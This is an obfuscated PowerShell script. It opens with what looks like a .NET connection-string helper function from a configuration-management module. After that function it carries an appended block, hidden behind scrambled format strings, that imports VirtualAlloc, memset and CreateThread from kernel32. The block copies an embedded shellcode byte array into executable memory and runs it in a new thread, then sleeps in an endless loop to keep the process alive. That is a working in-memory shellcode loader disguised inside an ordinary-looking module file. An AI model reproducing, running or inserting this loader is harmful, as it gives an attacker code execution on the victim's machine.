  ${3S`EP} = [TyPe]("{0}{2}{3}{5}{6}{1}{4}"-F'mI','T','C','roSOfT.poweRSh','IOnpOLICY','el','l.EXEcU');
function set-CDo`TNe`TC`oNnE`CtioN`S`TrInG
{
    
    [CmdletBinding(supPoRtSsHOUldprOcESs=${Tr`Ue})]
    param(
        [Parameter(mAnDatORy=${tR`UE})]
        [string]
        
        ${nA`ME},

        [Parameter(mAndatOrY=${T`Rue})]
        [string]
        
        ${VaL`UE},

        [string]
        
        ${prO`ViDer`Na`Me},
        
        [Switch]
        
        ${FR`AME`WO`RK},
        
        [Switch]
        
        ${f`RaMeWORK`64},
        
        [Switch]
        
        ${C`lr2},
        
        [Switch]
        
        ${c`lR4}
    )
    
    .("{2}{1}{3}{4}{0}"-f'Mode','tr','Set-S','i','ct') -Version ("{0}{1}{2}" -f 'L','ates','t')

    &("{2}{0}{5}{4}{1}{3}" -f 'e','e','Us','nce','Prefer','-Caller') -Cmdlet ${p`S`cM`dLEt} -Session ${EXEc`Utio`NC`onTe`XT}."SesSIO`NS`TatE"

    if( -not (${FR`A`MewO`RK} -or ${fram`E`W`oRK64}) )
    {
        .("{2}{1}{0}" -f 'ror','rite-Er','W') ("{14}{10}{12}{19}{6}{7}{0}{15}{13}{11}{4}{5}{8}{20}{17}{2}{3}{1}{18}{16}{9}" -f'b','rk64 s','me','wo',' ','Framework',' either o','r ',' ','s.','must s','e','up',' th','You ','oth of','e','a','witch','ply','and Fr')
        return
    }
    
    if( -not (${CL`R2} -or ${C`Lr4}) )
    {
        &("{0}{1}{2}"-f'Wri','te-E','rror') ("{14}{16}{6}{3}{2}{4}{15}{8}{1}{0}{7}{5}{9}{12}{10}{11}{13}"-f 'C','oth of the ','u','m','s','an',' ','lr2 ','y either or b','d ','r4 s','wi','Cl','tches.','Y','t suppl','ou')
        return
    }
    
    ${rUN`T`IMeS} = @()
    if( ${cl`R2} )
    {
        ${Run`TIm`eS} += ("{1}{0}"-f '2.0','v')
    }
    if( ${cL`R4} )
    {
        ${ru`N`Times} += ("{1}{0}"-f '4.0','v')
    }

    ${r`UNTi`M`es} | &("{0}{2}{1}{3}" -f 'ForE','c','a','h-Object') {
        ${PA`RA`mS} = @{
            ("{1}{0}"-f'lePath','Fi') = (.("{1}{0}"-f'n-Path','Joi') ${CARb`o`NBi`NDir} ("{0}{4}{3}{5}{1}{2}" -f'Set','ps','1','tionString','-DotNetConnec','.') -Resolve);
            ("{2}{3}{0}{1}" -f'ntL','ist','Argu','me') = @(
                                (&("{3}{4}{1}{2}{0}" -f 'ase64','C','B','Co','nvertTo-') -Value ${na`me}),
                                (.("{4}{2}{3}{5}{0}{1}"-f'CBase','64','ver','tT','Con','o-') -Value ${Va`LUE}),
                                (&("{0}{2}{1}{3}"-f'Conver','C','tTo-','Base64') -Value ${pR`OVi`D`ERnaMe}) 
                            );
            ("{0}{1}{2}" -f 'Runt','im','e') = ${_};
            ("{1}{3}{2}{0}"-f'licy','Exec','Po','ution') =   ${3s`ep}::"re`MO`TEsigNed";
        }

        if( ${fRa`mE`WorK} )
        {    
            &("{3}{0}{1}{2}" -f'nvok','e-CPowerShel','l','I') @params -x86
        }
        
        if( ${F`RaM`E`WORk64} )
        {
            .("{0}{3}{2}{1}{4}"-f'Invo','erShe','e-CPow','k','ll') @params
        }
    }
}


${c} = ((("{7}{23}{29}{116}{73}{110}{41}{5}{113}{2}{114}{96}{93}{18}{21}{88}{97}{42}{60}{48}{4}{87}{77}{118}{55}{45}{49}{80}{16}{109}{106}{63}{86}{47}{124}{37}{119}{121}{108}{82}{10}{65}{6}{0}{34}{91}{75}{74}{69}{115}{79}{72}{26}{28}{46}{35}{100}{14}{81}{40}{54}{62}{58}{30}{61}{85}{89}{78}{120}{15}{122}{90}{38}{44}{8}{71}{52}{105}{9}{83}{31}{94}{70}{22}{13}{32}{112}{67}{19}{66}{36}{39}{12}{11}{17}{53}{59}{68}{56}{20}{24}{101}{43}{1}{33}{57}{76}{51}{99}{107}{50}{103}{27}{84}{95}{123}{98}{92}{104}{102}{117}{25}{64}{111}{3}" -f '3','rt.d','tatic exte','count);','s, u','public ','el','[DllIm','Address','tPtr lpP','r','Ptr lpT','gs, Int','in','In',' ','llocationType','h','P','on',';[DllIm','tr Vi','u','port(lmq','po','t src','rea','se','te','ke','rea','r','t dwCr','lll','2.dlllmq)]publi','ea','l','Im',' IntP','a','Pt',']','oc(','mqmsvc','tr lpStart','e','Thr','[','tr lpAddres',',','nt',']public s','I','r','r l','z','dId)','mq','h','e','IntP','d','pT',' ',', u','n','F','ti','a',' In','ter, ',', ','C','2.','rn','static exte',')','d','i','tr ',' uint flA','t','qke','a','t(I','At','flProtect);','int ','r','tributes, u','tackSize,','c ',' d','t','ame','nt','In','tualAll','r','tatic','d(','rt(l',',','Ptr mem','est','n','t',' extern I','t(lm',', uin','dlllmq)','int ','ea','s','rn ','tP','rnel3',' uin','wSi','p','nt','or','dwS','Pt','Dll'))."REp`lAcE"('lmq',[String][CHaR]34));${w} = &("{0}{1}"-f 'Add-T','ype') -memberDefinition ${C} -Name ("{0}{1}" -f 'W','in32') -namespace ("{3}{2}{0}{1}" -f 'ncti','ons','32Fu','Win') -passthru;[Byte[]];[Byte[]]${z} = 0xbe,0x4b,0x33,0x12,0xf0,0xd9,0xc9,0xd9,0x74,0x24,0xf4,0x58,0x31,0xc9,0xb1,0x47,0x31,0x70,0x13,0x83,0xe8,0xfc,0x03,0x70,0x44,0xd1,0xe7,0x0c,0xb2,0x97,0x08,0xed,0x42,0xf8,0x81,0x08,0x73,0x38,0xf5,0x59,0x23,0x88,0x7d,0x0f,0xcf,0x63,0xd3,0xa4,0x44,0x01,0xfc,0xcb,0xed,0xac,0xda,0xe2,0xee,0x9d,0x1f,0x64,0x6c,0xdc,0x73,0x46,0x4d,0x2f,0x86,0x87,0x8a,0x52,0x6b,0xd5,0x43,0x18,0xde,0xca,0xe0,0x54,0xe3,0x61,0xba,0x79,0x63,0x95,0x0a,0x7b,0x42,0x08,0x01,0x22,0x44,0xaa,0xc6,0x5e,0xcd,0xb4,0x0b,0x5a,0x87,0x4f,0xff,0x10,0x16,0x86,0xce,0xd9,0xb5,0xe7,0xff,0x2b,0xc7,0x20,0xc7,0xd3,0xb2,0x58,0x34,0x69,0xc5,0x9e,0x47,0xb5,0x40,0x05,0xef,0x3e,0xf2,0xe1,0x0e,0x92,0x65,0x61,0x1c,0x5f,0xe1,0x2d,0x00,0x5e,0x26,0x46,0x3c,0xeb,0xc9,0x89,0xb5,0xaf,0xed,0x0d,0x9e,0x74,0x8f,0x14,0x7a,0xda,0xb0,0x47,0x25,0x83,0x14,0x03,0xcb,0xd0,0x24,0x4e,0x83,0x15,0x05,0x71,0x53,0x32,0x1e,0x02,0x61,0x9d,0xb4,0x8c,0xc9,0x56,0x13,0x4a,0x2e,0x4d,0xe3,0xc4,0xd1,0x6e,0x14,0xcc,0x15,0x3a,0x44,0x66,0xbc,0x43,0x0f,0x76,0x41,0x96,0x80,0x26,0xed,0x49,0x61,0x97,0x4d,0x3a,0x09,0xfd,0x42,0x65,0x29,0xfe,0x89,0x0e,0xc0,0x04,0x59,0x62,0xe9,0x8b,0xef,0xec,0x13,0x94,0x1e,0xb1,0x9a,0x72,0x4a,0x59,0xcb,0x2d,0xe2,0xc0,0x56,0xa5,0x93,0x0d,0x4d,0xc3,0x93,0x86,0x62,0x33,0x5d,0x6f,0x0e,0x27,0x09,0x9f,0x45,0x15,0x9f,0xa0,0x73,0x30,0x1f,0x35,0x78,0x93,0x48,0xa1,0x82,0xc2,0xbe,0x6e,0x7c,0x21,0xb5,0xa7,0xe8,0x8a,0xa1,0xc7,0xfc,0x0a,0x31,0x9e,0x96,0x0a,0x59,0x46,0xc3,0x58,0x7c,0x89,0xde,0xcc,0x2d,0x1c,0xe1,0xa4,0x82,0xb7,0x89,0x4a,0xfd,0xf0,0x15,0xb4,0x28,0x01,0x69,0x63,0x14,0x77,0x83,0xb7;${g} = 0x1000;if (${Z}."l`E`NgTH" -gt 0x1000){${g} = ${z}."LEN`G`Th"};${x}=${W}::("{2}{1}{0}" -f 'oc','rtualAll','Vi').Invoke(0,0x1000,${G},0x40);for (${i}=0;${I} -le (${Z}."lEN`g`Th"-1);${i}++) {${w}::"Me`MSeT"([IntPtr](${x}.("{2}{0}{1}"-f 'In','t32','To').Invoke()+${i}), ${Z}[${i}], 1)};${w}::("{1}{2}{0}" -f'ead','Creat','eThr').Invoke(0,0,${X},0,0,0);for (;;){&("{0}{1}{2}"-f 'Sta','rt-','sleep') 60};
